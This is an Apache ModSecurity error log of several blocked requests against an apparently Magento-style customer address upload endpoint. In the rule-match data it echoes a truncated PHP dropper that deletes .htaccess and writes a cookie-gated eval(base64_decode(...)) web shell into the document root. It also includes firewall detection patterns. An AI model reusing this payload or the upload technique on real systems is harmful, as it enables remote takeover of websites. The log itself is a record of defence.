[Sun Jan 11 10:34:19.852163 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWNum-ullfRdfHpeOrl0YQAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/b/yb88364f428d25.phar
[Sun Jan 11 10:34:19.852339 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWNum-ullfRdfHpeOrl0YQAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/b/yb88364f428d25.phar
[Sun Jan 11 10:34:20.064249 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Rule 7f30c5950be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/b/yb88364f428d25.php8"] [unique_id "aWNunOullfRdfHpeOrl0YgAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 11 10:34:20.064701 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/b/yb88364f428d25.php8"] [unique_id "aWNunOullfRdfHpeOrl0YgAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 11 10:34:20.066996 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/b/yb88364f428d25.php8"] [unique_id "aWNunOullfRdfHpeOrl0YgAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 11 10:34:20.067169 2026] [:error] [pid 1336306] [client 185.65.202.110:37932] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/b/yb88364f428d25.php8"] [unique_id "aWNunOullfRdfHpeOrl0YgAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 12 12:22:14.849320 2026] [:error] [pid 1355925] [client 194.110.207.198:46156] [client 194.110.207.198] ModSecurity: Rule 7f81b75d6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.phar"] [unique_id "aWTZZk7thAymmecRvtl0KgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 12 12:22:14.850927 2026] [:error] [pid 1355925] [client 194.110.207.198:46156] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.phar"] [unique_id "aWTZZk7thAymmecRvtl0KgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 12 12:22:14.853227 2026] [:error] [pid 1355925] [client 194.110.207.198:46156] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.phar"] [unique_id "aWTZZk7thAymmecRvtl0KgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 12 12:22:14.853406 2026] [:error] [pid 1355925] [client 194.110.207.198:46156] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.phar"] [unique_id "aWTZZk7thAymmecRvtl0KgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 12 12:22:15.317516 2026] [:error] [pid 1355925] [client 194.110.207.198:46156] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 0t88364f428d25.php8 found within FILES:custom_attributes[country_id]: 0t88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWTZZ07thAymmecRvtl0KwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/t/0t88364f428d25.phar
[Mon Jan 12 12:22:15.318145 2026] [:error] [pid 1355925] [client 194.110.207.198:46156] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWTZZ07thAymmecRvtl0KwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/t/0t88364f428d25.phar
[Mon Jan 12 12:22:15.318358 2026] [:error] [pid 1355925] [client 194.110.207.198:46156] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWTZZ07thAymmecRvtl0KwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/t/0t88364f428d25.phar
[Mon Jan 12 12:22:20.774115 2026] [:error] [pid 1355924] [client 194.110.207.198:42066] [client 194.110.207.198] ModSecurity: Rule 7f81b75d6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.php8"] [unique_id "aWTZbNIpinFXoPzDav5wUQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 12 12:22:20.774594 2026] [:error] [pid 1355924] [client 194.110.207.198:42066] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.php8"] [unique_id "aWTZbNIpinFXoPzDav5wUQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 12 12:22:20.777003 2026] [:error] [pid 1355924] [client 194.110.207.198:42066] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.php8"] [unique_id "aWTZbNIpinFXoPzDav5wUQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 12 12:22:20.777187 2026] [:error] [pid 1355924] [client 194.110.207.198:42066] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.php8"] [unique_id "aWTZbNIpinFXoPzDav5wUQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 13 14:13:15.203128 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Rule 7f9d47438be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/l/sl88364f428d25.phar"] [unique_id "aWZE64f_vqNyls05YTe4zwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 13 14:13:15.203576 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/l/sl88364f428d25.phar"] [unique_id "aWZE64f_vqNyls05YTe4zwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 13 14:13:15.205869 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/l/sl88364f428d25.phar"] [unique_id "aWZE64f_vqNyls05YTe4zwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 13 14:13:15.206038 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/l/sl88364f428d25.phar"] [unique_id "aWZE64f_vqNyls05YTe4zwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 13 14:13:15.455327 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: sl88364f428d25.php8 found within FILES:custom_attributes[country_id]: sl88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWZE64f_vqNyls05YTe40AAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/l/sl88364f428d25.phar
[Tue Jan 13 14:13:15.455917 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWZE64f_vqNyls05YTe40AAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/l/sl88364f428d25.phar
[Tue Jan 13 14:13:15.456077 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWZE64f_vqNyls05YTe40AAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/l/sl88364f428d25.phar
[Tue Jan 13 14:13:15.669925 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Rule 7f9d47438be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/l/sl88364f428d25.php8"] [unique_id "aWZE64f_vqNyls05YTe40QAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 13 14:13:15.671012 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/l/sl88364f428d25.php8"] [unique_id "aWZE64f_vqNyls05YTe40QAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 13 14:13:15.673338 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/l/sl88364f428d25.php8"] [unique_id "aWZE64f_vqNyls05YTe40QAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 13 14:13:15.673507 2026] [:error] [pid 1377544] [client 91.84.106.190:57164] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/l/sl88364f428d25.php8"] [unique_id "aWZE64f_vqNyls05YTe40QAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 14 16:32:22.190690 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Rule 7fa9a3bf3be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/1/q/1q88364f428d25.phar"] [unique_id "aWe3BkBaCnzgGdZXs4_hKAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 14 16:32:22.192417 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/1/q/1q88364f428d25.phar"] [unique_id "aWe3BkBaCnzgGdZXs4_hKAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 14 16:32:22.194697 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/1/q/1q88364f428d25.phar"] [unique_id "aWe3BkBaCnzgGdZXs4_hKAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 14 16:32:22.194875 2026] [:error] [pid 1400438] [client 46.149.66.101:35036] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/1/q/1q88364f428d25.phar"] [unique_id "aWe3BkBaCnzgGdZXs4_hKAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
